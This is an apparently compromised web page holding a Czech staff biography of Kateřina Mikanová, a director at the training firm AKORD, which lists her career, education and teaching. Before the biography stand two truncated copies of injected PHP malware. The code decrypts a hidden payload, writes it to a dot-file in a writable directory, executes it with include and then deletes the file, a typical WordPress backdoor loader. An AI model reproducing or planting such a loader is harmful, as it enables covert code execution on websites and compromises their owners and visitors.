100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Kateřina Mikanová - AKORD OT

je obchodní a marketingovou ředitelkou AKORDu, lektorkou v oblasti rozvoje lidských zdrojů a konzultantkou oblasti personálního řízení,  s AKORDem spolupracuje od jeho vzniku v roce 2004

  • v dubnu 2014 nastoupila do AKORDu na pozici obchodní ředitelky
  • od roku 2012 do počátku roku 2014 pracovala na pozici personalistky v logistické společnosti, zkušenosti získávala také jako metodik kurzů ve vzdělávací společnosti
  • absolvovala FF UK v Praze, obor andragogika a personální řízení, část studia strávila na Universität Bamberg v Německu, kde se také účastnila několika praktických tréninků, mj. workshopu Visualisieren & Präsentieren
  • pravidelně navštěvuje vzdělávací kurzy a workshopy, například Nové role v recruitmentu, AC/DC nanečisto či fórum Práce s talenty včera a dnes či Personální řízení ve výrobních podnicích
  • vede přípravné kurzy na přijímací řízení na VŠ (Andragogika a didaktika, Personální řízení, Teorie organizace a řízení)
  • externě vyučuje na UJEP (předměty Facilitační dovednosti, Outdoor management training a Zážitková pedagogika)
  • ve volném čase se aktivně věnuje sportu (zejména orientačnímu běhu, jízdě na kole a florbalu), ráda navštěvuje divadla a poznává nové země

Kateřinu najdete na: